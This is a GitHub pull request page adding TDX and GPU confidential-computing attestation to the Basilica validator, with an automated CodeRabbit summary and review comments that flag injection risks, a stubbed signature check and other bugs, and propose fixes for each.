Skip to content

Feat/tee#365

Open
distributedstatemachine wants to merge 9 commits intomainfrom
feat/tee
Open

Feat/tee#365
distributedstatemachine wants to merge 9 commits intomainfrom
feat/tee

Conversation

@distributedstatemachine
Copy link
Member

@distributedstatemachine distributedstatemachine commented Feb 12, 2026

Summary

Brief description of what this PR does.

Related Issues

Closes #(issue number)

Type of Change

  • Bug fix (non-breaking change that fixes an issue)
  • New feature (non-breaking change that adds functionality)
  • Breaking change (fix or feature that would cause existing functionality to not work as expected)
  • Documentation update
  • Performance improvement
  • Code refactoring

Changes Made

List the main changes in this PR:

Testing

How Has This Been Tested?

Describe the tests you ran to verify your changes.

  • Unit tests pass (cargo test)
  • Integration tests pass
  • Manual testing completed

Test Configuration

  • OS:
  • Rust version:
  • Bittensor version (if applicable):

Checklist

  • My code follows the project's style guidelines
  • I have run cargo fmt to format my code
  • I have run cargo clippy and addressed all warnings
  • I have added tests that prove my fix is effective or that my feature works
  • New and existing unit tests pass locally with my changes
  • I have commented my code, particularly in hard-to-understand areas
  • I have made corresponding changes to the documentation
  • My changes generate no new warnings
  • Any dependent changes have been merged and published

Additional Context

Add any other context about the PR here.

Summary by CodeRabbit

  • New Features

    • Added support for Trusted Execution Environment (TEE) verification including Intel TDX and NVIDIA GPU Confidential Computing attestation
    • Added new API endpoints for querying TEE status summary, node-specific TEE details, and checking TEE availability
    • Added configuration options to require and enforce TEE capabilities across nodes
    • Added remote attestation integration for TEE verification services
    • Added TEE verification status tracking in the database
  • Chores

    • Added basilica-tee crate and integrated it into the validator
    • Added TEE-related database migrations and persistence layer

@coderabbitai
Copy link
Contributor

coderabbitai bot commented Feb 12, 2026

Walkthrough

Introduces comprehensive Trusted Execution Environment (TEE) support across the Basilica codebase through a new basilica-tee crate, validator integration for TDX quote and GPU CC attestation verification, database persistence, API endpoints for TEE status queries, and bootstrap workflows for remote TEE configuration.

Changes

Cohort / File(s) Summary
Build & Workspace Configuration
.cargo/config.toml, .github/workflows/ci.yml, Cargo.toml, crates/basilica-tee/Cargo.toml
Updated Cargo configuration with PyO3 Python path; added basilica-tee to CI pipeline with new build-tee job, changes detection, and workflow integration; extended workspace members to include basilica-tee crate.
Example & Validator Configuration
config/validator.toml.example, crates/basilica-validator/src/config/main_config.rs
Added TEE verification configuration block with TDX, GPU CC, MRTD/RTMR expectations, GPU model allowlisting, and remote attestation settings; extended VerificationConfig with TeeValidationConfig.
New basilica-tee Crate - Core Library
crates/basilica-tee/src/lib.rs, crates/basilica-tee/README.md, crates/basilica-tee/src/error.rs, crates/basilica-tee/src/config.rs, crates/basilica-tee/src/types/*, crates/basilica-tee/src/traits.rs
Established public API surface, error handling, configuration structures, and trait definitions for TEE operations; introduced GpuDeviceInfo, GpuAttestationEvidence, ExpectedMeasurements, and TeeVerificationResult types.
TDX Support - basilica-tee
crates/basilica-tee/src/tdx/*
Implements TDX quote parsing (TdxQuoteV4, QuoteHeader, TdReport), quote generation (TdxQuoteProvider via CLI invocation), local and remote verification (TdxQuoteVerifier, RemoteTdxVerifier with DCAP support).
GPU CC Support - basilica-tee
crates/basilica-tee/src/gpu/*
Provides GPU device detection (GpuDeviceProvider with NVML support), evidence generation (NvEvidenceProvider), parsing (JsonEvidenceParser), local and remote verification (LocalGpuVerifier, RemoteGpuVerifier with NRAS support), and utility functions.
Bootstrapping & Setup - basilica-tee
crates/basilica-tee/src/bootstrap/*
Defines shell command templates for TDX/GPU detection, installation, and configuration; includes TDX host/guest VM orchestration, PCCS setup, and comprehensive end-to-end bootstrap workflows; provides parsing utilities for command output interpretation.
Attestation Service - basilica-tee
crates/basilica-tee/src/service.rs, crates/basilica-tee/src/crypto/*, crates/basilica-tee/src/server/*
Implements TeeService orchestrator combining TDX and GPU attestation; adds OpenSSL-based certificate hashing; provides HTTP attestation server with Axum routes for health, attestation generation, and device queries.
Validator Integration - Miner Prover
crates/basilica-validator/src/miner_prover/validation_tee.rs, crates/basilica-validator/src/miner_prover/validation_tdx_host.rs, crates/basilica-validator/src/miner_prover/validation_strategy.rs, crates/basilica-validator/src/miner_prover/types.rs
Introduces TeeValidator orchestrator for remote verification; TdxHostValidator for SSH-based TDX host readiness checks and setup; integrates TEE verification into validation strategy with metrics and persistence.
Validator API Routes
crates/basilica-api/src/api/routes/tee.rs, crates/basilica-validator/src/api/routes/tee.rs, crates/basilica-validator/src/api/routes/rentals.rs, crates/basilica-validator/src/api/mod.rs
Adds TEE status endpoints (summary, per-node status, verified nodes list); implements TEE requirement checking for rental startups; extends rental request with TeeRequirements; wires new routes into API router.
Validator API Client & Storage
crates/basilica-validator/src/api/client.rs, crates/basilica-validator/src/persistence/tee_profile.rs, crates/basilica-validator/migrations/004_add_tee_status.sql
Adds ValidatorClient methods for TEE endpoints; implements persistence layer (store, query, summarize TEE status); creates node_tee_status table with verification fields, indexes, and verification_logs augmentation.
Validator Dependencies & Tooling
crates/basilica-validator/Cargo.toml, justfile
Added basilica-tee dependency with remote-attestation feature and getrandom; introduced comprehensive Justfile targets for TDX host/guest testing workflows with SSH parameter support.
Metrics & Observability
crates/basilica-validator/src/metrics/prometheus_metrics.rs, crates/basilica-validator/src/miner_prover/scheduler.rs
Adds TEE metrics (verification counters, gauges, histograms, durations) and collection methods; includes per-node recording for TDX quote generation and GPU CC attestation.
Testing & Examples
crates/basilica-tee/tests/integration_test.rs, crates/basilica-validator/tests/tee_integration_test.rs, crates/basilica-validator/tests/tdx_host_integration_test.rs
Comprehensive integration tests for TEE quote parsing, GPU evidence, config handling, TDX host/VM workflows; extensive live-environment tests with SSH and environment-driven configuration.
Minor Updates
crates/basilica-validator/src/miner_prover/mod.rs, crates/basilica-validator/src/persistence/mod.rs, crates/basilica-validator/src/cli/handlers/rental.rs, various test files
Module declarations, field additions (tee_requirements, tee_verification), and test configuration updates to support TEE integration throughout the validator.

Sequence Diagram(s)

sequenceDiagram
    participant Client
    participant Validator API
    participant TEE Service
    participant Database
    participant Remote Executor (SSH)

    Client->>Validator API: POST /tee/attest (node_id, nonce)
    Validator API->>TEE Service: attest(nonce)
    
    TEE Service->>Remote Executor: SSH: Generate TDX quote
    Remote Executor-->>TEE Service: TDX quote bytes
    TEE Service->>Remote Executor: SSH: Generate GPU evidence
    Remote Executor-->>TEE Service: GPU attestation evidence JSON
    
    TEE Service->>TEE Service: Verify TDX quote (check MRTD/RTMRs)
    TEE Service->>TEE Service: Verify GPU evidence (parse & check nonce)
    
    TEE Service-->>Validator API: TeeVerificationResult
    Validator API->>Database: store_node_tee_status(verification)
    Database-->>Validator API: OK
    
    Validator API-->>Client: AttestationResponse (quote, evidence, status)
Loading
sequenceDiagram
    participant CLI/Job
    participant TDX Host Validator
    participant Remote Host (SSH)
    participant Persistence

    CLI/Job->>TDX Host Validator: setup_tdx_host_full()
    
    TDX Host Validator->>Remote Host: SSH: Check TDX status
    Remote Host-->>TDX Host Validator: Status (BIOS, kernel, QGS, etc.)
    TDX Host Validator->>TDX Host Validator: Parse status output
    
    TDX Host Validator->>Remote Host: SSH: Install TDX packages
    Remote Host-->>TDX Host Validator: Installation result
    
    TDX Host Validator->>Remote Host: SSH: Configure GRUB
    Remote Host-->>TDX Host Validator: Config result
    
    alt Reboot Required
        TDX Host Validator->>Remote Host: SSH: Reboot
        TDX Host Validator->>Remote Host: SSH: Wait for boot (poll boot_id)
        Remote Host-->>TDX Host Validator: System online
    end
    
    TDX Host Validator->>Remote Host: SSH: Verify TDX setup
    Remote Host-->>TDX Host Validator: Verification result
    
    TDX Host Validator->>Persistence: Store host setup status
    Persistence-->>TDX Host Validator: OK
    
    TDX Host Validator-->>CLI/Job: TdxHostStatus
Loading

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

Possibly related PRs

Suggested reviewers

  • itzlambda
  • epappas

Poem

🐰 Hops excitedly with bunny ears

TEE upon the horizon bright,
Quotes and proofs in cryptic flight,
GPU secrets verified true,
TDX magic, fresh and new! ✨

🚥 Pre-merge checks | ✅ 2 | ❌ 1
❌ Failed checks (1 inconclusive)
Check name Status Explanation Resolution
Title check ❓ Inconclusive The title 'Feat/tee' uses a non-descriptive term and lacks specificity about what the feature entails. Consider using a more descriptive title that clearly conveys the feature's purpose, e.g., 'Add TEE (Trusted Execution Environment) support with TDX and GPU CC verification'.
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Docstring Coverage ✅ Passed Docstring coverage is 100.00% which is sufficient. The required threshold is 80.00%.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing touches
  • 📝 Generate docstrings
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch feat/tee

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

Copy link
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 14

Note

Due to the large number of review comments, Critical severity comments were prioritized as inline comments.

🤖 Fix all issues with AI agents
In `@crates/basilica-tee/src/gpu/nvtrust.rs`:
- Around line 77-105: The get_evidence_python_sdk function currently
interpolates the nonce directly into a Python script which allows command
injection; validate and sanitize the nonce before using it in the format! call:
ensure the nonce string contains only hex characters (0-9, a-f, A-F) and the
expected length (or return a TeeError::GpuAttestation on invalid input), and
only then build the script passed to Command::new("python3"); alternatively,
avoid interpolation by passing the nonce via stdin or as a safe argument to the
Python process (but if keeping the script string, enforce strict hex validation
of the nonce variable first).

In `@crates/basilica-tee/src/service.rs`:
- Around line 206-208: The current fallback sets nonce =
expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes()), which uses the UTF-8
bytes of the hex string instead of the decoded nonce bytes; change this to
decode attestation.nonce_hex from hex (e.g., via hex::decode or similar) and use
the resulting Vec<u8> / slice as the fallback for nonce, handling any decode
errors (returning an Err/verification failure) rather than silently using the
UTF-8 bytes; update the assignment that produces nonce and any downstream
expectations to use the decoded bytes (referencing expected_nonce,
attestation.nonce_hex, and the nonce variable).

In `@crates/basilica-tee/src/tdx/provider.rs`:
- Around line 183-188: The implementation of TdxQuoteProvider::generate_quote
incorrectly hex-encodes full 64-byte report_data then hands it to get_quote
which treats it as a nonce (causing truncation when cert hash/padding are
applied); change generate_quote so it does NOT re-interpret raw report_data as a
nonce: either call a new/internal helper that sends the hex-encoded report_data
directly to the CLI without nonce+cert_hash logic, or update get_quote to accept
a flag/alternate path for pre-formed report_data and bypass the
nonce+cert_hash/padding routine; update TdxQuoteProvider::generate_quote to use
that direct path (reference: generate_quote, get_quote, QuoteProvider,
TdxQuoteProvider) and ensure length handling matches the expected CLI input for
full report blobs.
- Around line 93-116: In get_quote, the Some(cert_hash) branch builds
report_data by concatenating nonce + hash then truncating but it never pads when
the combined length < 128, producing too-short report data; update the
Some(cert_hash) branch (in function get_quote) to after concatenation call
data.truncate(128) and then while data.len() < 128 push '0' (same padding logic
as the else branch) so the final report_data is exactly 128 hex chars (64
bytes).

In `@crates/basilica-tee/src/tdx/quote.rs`:
- Around line 26-39: The QuoteHeader struct is missing the second 2-byte
reserved field which shifts qe_vendor_id and user_data by 2 bytes and causes
to_bytes() to emit only 46 bytes; add a second reserved field (e.g., reserved2:
[u8; 2]) to QuoteHeader so the layout matches the 48-byte TDX header, update any
parsing/serialization logic in QuoteHeader::to_bytes() and the
constructor/deserializer to read/write all 48 bytes (including reserved2) so
qe_vendor_id (16 bytes) and user_data (20 bytes) are at the correct offsets, and
ensure to_bytes() writes the full 48 bytes (no trailing zeros). Also fix
verify_nonce() to perform a full 32-byte equality check against the expected
nonce (not a prefix compare) so the entire nonce field is validated.

In `@crates/basilica-tee/src/tdx/remote_verification.rs`:
- Around line 42-51: The struct DcapVerificationRequest currently defines the
field is_v_enclave_quote_status which serializes incorrectly; rename that field
to isv_enclave_quote: String so that serde(rename_all = "camelCase") produces
the expected "isvEnclaveQuote" key, and update any construction/usage of
DcapVerificationRequest (the creation site referenced in the review at line 114)
to set the new isv_enclave_quote field instead of is_v_enclave_quote_status;
keep the nonce: Option<String> as-is.

In `@crates/basilica-tee/src/tdx/verification.rs`:
- Around line 119-130: The verify_signature function currently unconditionally
returns Ok(true) which lets any TdxQuoteV4 be treated as valid; change
verify_signature to fail-safe by returning Ok(false) by default and implement a
runtime feature/config flag (e.g., a crate feature or a config variable checked
inside verify_signature) that enables the stubbed "always-true" behavior only
for testing; additionally emit a clear warning log when the permissive mode is
enabled so callers (and TEE status consumers like
TeeVerificationStatus::from_tee_result) are aware this is not real verification.

In `@crates/basilica-validator/src/api/mod.rs`:
- Around line 166-174: The router registers POST /tee/availability twice which
will panic; remove the duplicate that uses routes::check_tee_availability and
keep the routes::tee::check_tee_availability registration instead. Locate the
two .route("/tee/availability", post(...)) entries in the router setup and
delete the one referencing routes::check_tee_availability so only
routes::tee::check_tee_availability remains as the POST handler. Ensure no other
duplicate registrations for the same path+method remain.

In `@crates/basilica-validator/src/api/routes/tee.rs`:
- Around line 107-143: The handler get_node_tee_status currently calls
state.persistence.get_node_tee_status_by_node_id(&node_id) which only filters by
node_id but the table PK is (miner_uid, node_id); update the endpoint and
persistence usage to avoid returning an arbitrary row: either (A) change the
route signature to accept miner_uid (e.g. Path<(String, String)> or a separate
Path/Query param), call a new persistence method like
get_node_tee_status_by_miner_and_node(miner_uid, node_id) and return the single
NodeTeeStatusResponse, or (B) modify the persistence call to return all matching
rows (e.g. get_node_tee_statuses_by_node_id(node_id) -> Vec<Row>) and change the
response to a list/collection of NodeTeeStatusResponse; update the code paths
that map Row -> NodeTeeStatusResponse accordingly (references:
get_node_tee_status, state.persistence.get_node_tee_status_by_node_id,
NodeTeeStatusResponse). Ensure API signature, route parsing, and persistence
method names are adjusted together and errors/NotFound semantics are preserved.

In `@crates/basilica-validator/src/miner_prover/validation_tdx_host.rs`:
- Around line 274-278: The command assembly in validation_tdx_host.rs
dangerously interpolates user-controlled values (e.g., intel_api_key into the
local `cmd` string using `tdx_host::CONFIGURE_PCCS`) and likewise `vm_name` in
`create_test_tdx_vm`, `cleanup_test_vm`, and the `bash -c` wrappers used by
`test_guest_quote_generation`/`wait_for_vm`, which allows shell injection; fix
by escaping single quotes in all interpolated values (replace '\'' with
'\'"\'"\'') before building the `cmd` string or, preferably, stop embedding
values into single-quoted shell lines and pass them via the SSH
transport/environment variable assignment supported by your SSH client, updating
the code paths that build `cmd` (the `intel_api_key` usage and all `vm_name`
interpolations) to use the chosen safe method consistently.
- Around line 770-774: The code currently uses .replace('\n', "; ") on tdx_guest
script constants which corrupts shell comments and heredocs; change
create_disk_cmd (and all other places using this pattern with
tdx_guest::CREATE_TDX_VM_DISK, CREATE_CLOUD_INIT, LAUNCH_TDX_VM_QEMU,
WAIT_FOR_TDX_VM, TEST_GUEST_QUOTE_GEN, CLEANUP_TDX_VM, FULL_TDX_GUEST_TEST) to
pass the multi-line script as a proper heredoc to bash (or write the script to a
temporary file and execute it) instead of joining lines—construct the command as
a bash -c heredoc (or create temp file) and feed the exact tdx_guest constant
contents without replacing newlines.

In `@crates/basilica-validator/src/miner_prover/validation_tee.rs`:
- Around line 938-942: The current getrandom calls use unwrap_or_default() for
tdx_nonce and gpu_nonce which silently produce all-zero nonces on failure;
change this to treat failures as hard errors: check the Result from getrandom
for both calls and return/propagate an Err (or panic with expect) instead of
filling with zeros. Update the code paths that call/construct tdx_nonce and
gpu_nonce in validation_tee.rs (the getrandom invocations that populate
tdx_nonce and gpu_nonce) so any getrandom::getrandom error is handled explicitly
and fails fast with a clear error message.
- Around line 744-751: The code in validation_tee.rs is attempting to read
quote_output as a filesystem path via tokio::fs::read(quote_output) but
quote_output is the SSH stdout (the quote data), so that branch always fails;
remove the tokio::fs::read path and directly decode the quote data (e.g. let
quote_bytes = hex::decode(quote_output).context("Failed to decode TDX quote")?)
or otherwise treat quote_output as the raw bytes received from SSH, updating the
error context accordingly; locate the code around the quote_bytes binding and
the variable quote_output to apply this change.

In `@crates/basilica-validator/src/persistence/tee_profile.rs`:
- Around line 238-260: The count_nodes_matching_tee_requirements function builds
SQL by interpolating expected_mrtd_hex directly, causing SQL injection; change
the implementation to append a parameter placeholder (e.g. " AND tdx_mrtd_hex =
?") when expected_mrtd_hex is Some(...) and pass the mrtd value via sqlx binding
instead of format! interpolation—use sqlx::query (or query_scalar) and call
.bind(mrtd) (or appropriate typed bind) before fetch_one/fetch_optional so the
tdx_mrtd_hex filter is applied safely without string concatenation.
🟠 Major comments (23)
.cargo/config.toml-3-5 (1)

3-5: ⚠️ Potential issue | 🟠 Major

Hardcoded macOS-only Python path will break on Linux/CI and other platforms.

/opt/homebrew/bin/python3 exists only on Apple Silicon Macs. This .cargo/config.toml is committed to the repo and applies to all developers and CI runners (which run Ubuntu). On systems without this path, PyO3 build discovery may fail or require an override.

Consider removing this from the shared config and letting developers set it locally (e.g., via an untracked .cargo/config-local.toml or environment variable), or use a more portable default like python3.

Suggested fix
-[env]
-# Use system Python for PyO3 builds (supports Python 3.10+)
-PYO3_PYTHON = "/opt/homebrew/bin/python3"
+# [env]
+# Set PYO3_PYTHON locally if needed, e.g.:
+# PYO3_PYTHON = "python3"
crates/basilica-tee/src/gpu/utils.rs-40-46 (1)

40-46: ⚠️ Potential issue | 🟠 Major

normalize_gpu_id doesn't handle lowercase "gpu-" prefix, producing malformed IDs.

If the input is "gpu-abc123", starts_with(GPU_ID_PREFIX) is false (since GPU_ID_PREFIX is "GPU-"), so the result is "GPU-gpu-abc123" — a double-prefixed, malformed ID.

Since sanitize_gpu_id already handles both cases, consider stripping first then re-prefixing:

Suggested fix
 pub fn normalize_gpu_id(gpu_id: &str) -> String {
-    if gpu_id.starts_with(GPU_ID_PREFIX) {
-        gpu_id.to_string()
-    } else {
-        format!("{}{}", GPU_ID_PREFIX, gpu_id)
-    }
+    let stripped = gpu_id
+        .strip_prefix("GPU-")
+        .or_else(|| gpu_id.strip_prefix("gpu-"))
+        .unwrap_or(gpu_id);
+    format!("{}{}", GPU_ID_PREFIX, stripped)
 }
crates/basilica-tee/src/types/measurements.rs-71-88 (1)

71-88: ⚠️ Potential issue | 🟠 Major

Add rust-version = "1.82" to basilica-tee's Cargo.toml or use an alternative to is_none_or.

Option::is_none_or requires Rust 1.82.0, but the workspace declares rust-version = "1.80" at the root level. The basilica-tee crate does not declare its own rust-version, creating an MSRV mismatch. This code will fail to compile on Rust 1.80. Either add rust-version = "1.82" to crates/basilica-tee/Cargo.toml or replace is_none_or with a compatible pattern like matches!(self.mrtd.as_ref(), None | Some(expected) if expected == mrtd).

crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs-158-265 (1)

158-265: ⚠️ Potential issue | 🟠 Major

LAUNCH_TDX_VM_QEMU uses libvirt/pflash, contradicting module docs and mismatching CLEANUP_TDX_VM.

Two related issues:

  1. Doc contradiction: The module header (Lines 8-9) explicitly states "-bios /usr/share/ovmf/OVMF.fd (NOT pflash, which requires unsupported KVM readonly memory)". But LAUNCH_TDX_VM_QEMU generates a libvirt XML with <loader … type='pflash'> (Line 219) and <nvram> (Line 220), which is the pflash approach.

  2. Cleanup mismatch: CLEANUP_TDX_VM uses PID files and monitor sockets (QEMU direct-launch artifacts), but LAUNCH_TDX_VM_QEMU launches via virsh define/virsh start. The cleanup should use virsh destroy/virsh undefine instead.

Either align LAUNCH_TDX_VM_QEMU with the documented -bios approach (matching FULL_TDX_GUEST_TEST), or update the docs and cleanup script to match the libvirt path.

Also applies to: 407-440

crates/basilica-tee/src/tdx/quote.rs-193-199 (1)

193-199: ⚠️ Potential issue | 🟠 Major

verify_nonce uses prefix matching, which weakens attestation verification.

A 1-byte nonce would match any quote whose first report_data byte equals that byte. For security-critical attestation, the nonce should be compared in full (e.g., require exactly 32 bytes and compare all of them), or at minimum the trailing bytes should be checked to be zero.

Proposed fix — require exact-length or zero-padded full comparison
     pub fn verify_nonce(&self, expected_nonce: &[u8]) -> bool {
         if expected_nonce.len() > 32 {
             return false;
         }
-        self.nonce()[..expected_nonce.len()] == *expected_nonce
+        // Compare the nonce portion and verify remaining bytes are zero
+        self.nonce()[..expected_nonce.len()] == *expected_nonce
+            && self.nonce()[expected_nonce.len()..].iter().all(|&b| b == 0)
     }
crates/basilica-validator/src/api/routes/rentals.rs-652-687 (1)

652-687: ⚠️ Potential issue | 🟠 Major

check_tee_availability ignores allowed_gpu_models — inconsistent with start_rental.

The TeeRequirements struct includes allowed_gpu_models (Line 42), and start_rental validates it (Lines 314–330). However, check_tee_availability does not pass it to count_nodes_matching_tee_requirements, so a client could receive an "available" response for a node that will be rejected at rental time due to GPU model mismatch.

Consider either forwarding allowed_gpu_models to the persistence query or documenting that availability is an approximation.

crates/basilica-validator/src/api/routes/rentals.rs-299-311 (1)

299-311: ⚠️ Potential issue | 🟠 Major

MRTD hex comparison is case-sensitive — may cause false mismatches.

status.tdx_mrtd_hex and expected_mrtd_hex are compared with direct string equality (Line 301). If one side stores hex in lowercase (aa) and the other in uppercase (AA), the check will fail incorrectly. Normalize both sides before comparing.

🐛 Proposed fix
                 if let Some(ref expected_mrtd) = request.tee_requirements.expected_mrtd_hex {
-                    if status.tdx_mrtd_hex.as_ref() != Some(expected_mrtd) {
+                    let expected_lower = expected_mrtd.to_lowercase();
+                    let matches = status.tdx_mrtd_hex.as_ref()
+                        .is_some_and(|actual| actual.to_lowercase() == expected_lower);
+                    if !matches {
crates/basilica-validator/src/miner_prover/validation_strategy.rs-412-431 (1)

412-431: ⚠️ Potential issue | 🟠 Major

Silently swallowing from_hex errors may hide configuration mistakes.

ExpectedMeasurements::from_hex(...).unwrap_or_default() will produce empty/default measurements if the admin provides malformed hex for expected_mrtd, expected_rtmr0, etc. This means measurement matching would silently pass or be skipped, which is a security concern for TEE validation.

Consider logging a warning when from_hex fails:

Suggested fix
-                expected_measurements: super::validation_tee::ExpectedMeasurements::from_hex(
+                expected_measurements: match super::validation_tee::ExpectedMeasurements::from_hex(
                     config.tee.expected_mrtd.as_deref(),
                     config.tee.expected_rtmr0.as_deref(),
                     config.tee.expected_rtmr1.as_deref(),
                     config.tee.expected_rtmr2.as_deref(),
                     config.tee.expected_rtmr3.as_deref(),
-                )
-                .unwrap_or_default(),
+                ) {
+                    Ok(m) => m,
+                    Err(e) => {
+                        warn!("Invalid TEE expected measurements config, using defaults: {}", e);
+                        Default::default()
+                    }
+                },
crates/basilica-tee/src/tdx/verification.rs-80-90 (1)

80-90: ⚠️ Potential issue | 🟠 Major

Absent nonce silently passes report_data_matches — potential security gap.

When expected_nonce is None, report_data_matches defaults to true (Line 89). This means callers that omit the nonce don't get any report data validation, but the result still looks like it passed. Consider defaulting to false when no nonce is provided, or renaming the field to make the semantic clearer (e.g., report_data_checked: bool + report_data_matches: Option<bool>).

crates/basilica-tee/src/gpu/nvtrust.rs-67-74 (1)

67-74: ⚠️ Potential issue | 🟠 Major

Blocking std::process::Command called from async code path.

check_python_sdk_available uses synchronous std::process::Command, but it's called from get_evidence (Line 169) which is an async method. This blocks the tokio runtime thread. Use tokio::process::Command or wrap in tokio::task::spawn_blocking.

Proposed fix
-    fn check_python_sdk_available() -> bool {
-        std::process::Command::new("python3")
+    async fn check_python_sdk_available() -> bool {
+        tokio::process::Command::new("python3")
             .args(["-c", "import nv_attestation_sdk"])
             .output()
+            .await
             .map(|o| o.status.success())
             .unwrap_or(false)
     }

Then update the call site at Line 169:

-                if Self::check_python_sdk_available() {
+                if Self::check_python_sdk_available().await {
crates/basilica-validator/src/miner_prover/types.rs-124-157 (1)

124-157: ⚠️ Potential issue | 🟠 Major

tdx_verified does not account for report_data_matches, diverging from TdxVerificationResult::is_valid().

In crates/basilica-tee/src/types/verification.rs (Line 31-33), TdxVerificationResult::is_valid() checks quote_valid && mrtd_matches && report_data_matches. Here, tdx_verified only checks quote_valid && mrtd_matches (Line 130), ignoring report_data_matches. Similarly, gpu_cc_verified only uses attestation_valid while GpuCcVerificationResult::is_valid() also requires cc_mode_enabled && nonce_verified.

If this is intentional (e.g., a more relaxed validator-side view), consider documenting that reasoning. Otherwise, align the criteria:

Proposed fix
         .map(|tdx| {
                 (
-                    tdx.quote_valid && tdx.mrtd_matches,
+                    tdx.quote_valid && tdx.mrtd_matches && tdx.report_data_matches,
                     Some(tdx.mrtd_hex.clone()),
                 )
             })
         .map(|gpu| {
                 (
-                    gpu.attestation_valid,
+                    gpu.attestation_valid && gpu.cc_mode_enabled && gpu.nonce_verified,
                     gpu.cc_mode_enabled,
                     Some(gpu.gpu_model.clone()),
                 )
             })
crates/basilica-tee/src/tdx/verification.rs-92-112 (1)

92-112: ⚠️ Potential issue | 🟠 Major

Pass/fail log ignores RTMR match results.

The pass/fail determination on Line 102 checks quote_valid, mrtd_matches, and report_data_matches, but not rtmr_matches. A quote where all 4 RTMRs fail will still log "Quote verification passed." Either include result.rtmr_matches.iter().all(|&m| m) in the condition, or clarify in logs/docs that RTMRs are informational-only.

Proposed fix
-        if result.quote_valid && result.mrtd_matches && result.report_data_matches {
+        let all_rtmrs_match = result.rtmr_matches.iter().all(|&m| m);
+        if result.quote_valid && result.mrtd_matches && result.report_data_matches && all_rtmrs_match {
crates/basilica-tee/src/types/verification.rs-78-117 (1)

78-117: ⚠️ Potential issue | 🟠 Major

Inconsistent tee_verified criteria across constructors.

The conditions for tee_verified vary:

  • verified() (Line 81): tdx.quote_valid && tdx.mrtd_matches && gpu_cc.cc_mode_enabled — ignores gpu_cc.attestation_valid, tdx.report_data_matches
  • tdx_only() (Line 100): tdx.quote_valid && tdx.mrtd_matches — ignores report_data_matches
  • gpu_only() (Line 110): gpu_cc.cc_mode_enabled && gpu_cc.attestation_valid — more stringent than the GPU portion of verified()

This means a node with invalid GPU attestation can still be tee_verified = true via verified(), while the same GPU state would yield false via gpu_only(). Consider using is_valid() methods for consistency:

Proposed fix
     pub fn verified(tdx: TdxVerificationResult, gpu_cc: GpuCcVerificationResult) -> Self {
-        let tee_verified = tdx.quote_valid && tdx.mrtd_matches && gpu_cc.cc_mode_enabled;
+        let tee_verified = tdx.is_valid() && gpu_cc.is_valid();
         Self {
             tdx: Some(tdx),
             gpu_cc: Some(gpu_cc),
             tee_verified,
         }
     }
     pub fn tdx_only(tdx: TdxVerificationResult) -> Self {
-        let tee_verified = tdx.quote_valid && tdx.mrtd_matches;
+        let tee_verified = tdx.is_valid();
         Self {
     pub fn gpu_only(gpu_cc: GpuCcVerificationResult) -> Self {
-        let tee_verified = gpu_cc.cc_mode_enabled && gpu_cc.attestation_valid;
+        let tee_verified = gpu_cc.is_valid();
         Self {
crates/basilica-api/src/api/routes/tee.rs-149-160 (1)

149-160: ⚠️ Potential issue | 🟠 Major

allowed_gpu_models is accepted from the client but silently dropped.

TeeRequirements at Line 159 includes allowed_gpu_models: Option<Vec<String>>, but the conversion to the validator's TeeRequirements at Lines 183-187 doesn't include this field (the validator struct lacks it). A caller supplying allowed_gpu_models would believe it's being used for filtering when it's actually ignored.

Either remove the field from the API-side struct, or propagate it to the validator.

Also applies to: 176-207

crates/basilica-validator/src/persistence/tee_profile.rs-161-182 (1)

161-182: ⚠️ Potential issue | 🟠 Major

SUM(...) returns NULL on an empty table — row.get::<i64, _>() will panic.

When node_tee_status is empty, COUNT(*) returns 0 but SUM(CASE ...) returns NULL. The row.get::<i64, _>("tee_verified_count") call will panic on NULL. Use COALESCE or handle the nullable case:

Proposed fix
         let row = sqlx::query(
             r#"
             SELECT 
                 COUNT(*) as total_nodes,
-                SUM(CASE WHEN tee_verified = 1 THEN 1 ELSE 0 END) as tee_verified_count,
-                SUM(CASE WHEN tdx_verified = 1 THEN 1 ELSE 0 END) as tdx_verified_count,
-                SUM(CASE WHEN gpu_cc_enabled = 1 THEN 1 ELSE 0 END) as gpu_cc_enabled_count
+                COALESCE(SUM(CASE WHEN tee_verified = 1 THEN 1 ELSE 0 END), 0) as tee_verified_count,
+                COALESCE(SUM(CASE WHEN tdx_verified = 1 THEN 1 ELSE 0 END), 0) as tdx_verified_count,
+                COALESCE(SUM(CASE WHEN gpu_cc_enabled = 1 THEN 1 ELSE 0 END), 0) as gpu_cc_enabled_count
             FROM node_tee_status
             "#,
         )
crates/basilica-validator/src/miner_prover/validation_tee.rs-878-903 (1)

878-903: ⚠️ Potential issue | 🟠 Major

Attestation considered valid when no tool is available — permissive fallback undermines verification.

When no attestation tool is found (Lines 897–901), attestation_valid is set to true and nonce_verified mirrors it (Line 903). This means a node with CC mode flag set but no actual attestation capability passes verification. An adversary could spoof nvidia-smi output to claim CC mode without providing cryptographic proof.

Consider requiring attestation tool availability when require_gpu_cc is set, or at least marking attestation_valid as false and nonce_verified as false when no tool is present, so the caller can make the policy decision.

crates/basilica-tee/src/service.rs-366-370 (1)

366-370: ⚠️ Potential issue | 🟠 Major

with_expected_measurements is a no-op.

This builder method silently discards the ExpectedMeasurements parameter. Callers will believe measurements are configured, but they aren't. This should either be implemented or removed to avoid a false sense of security.

crates/basilica-validator/src/miner_prover/validation_tee.rs-188-379 (1)

188-379: ⚠️ Potential issue | 🟠 Major

Shell script clones and compiles code from GitHub on remote nodes — significant supply chain risk.

The TDX tool installation script (Lines 238–348) clones intel/SGXDataCenterAttestationPrimitives from GitHub, builds C code, and installs the binary to /usr/local/bin/. This introduces supply chain risk:

  • No pinned commit hash or tag — --depth 1 fetches whatever HEAD is
  • No integrity verification of the cloned code
  • Compiles and installs as root

Consider pinning a specific commit hash, verifying a checksum of the built binary, or preferring the package-based installation path. Also, the embedded C code (Lines 242–341) directly interacts with TDX kernel ioctls — any changes in the kernel ABI could cause undefined behavior.

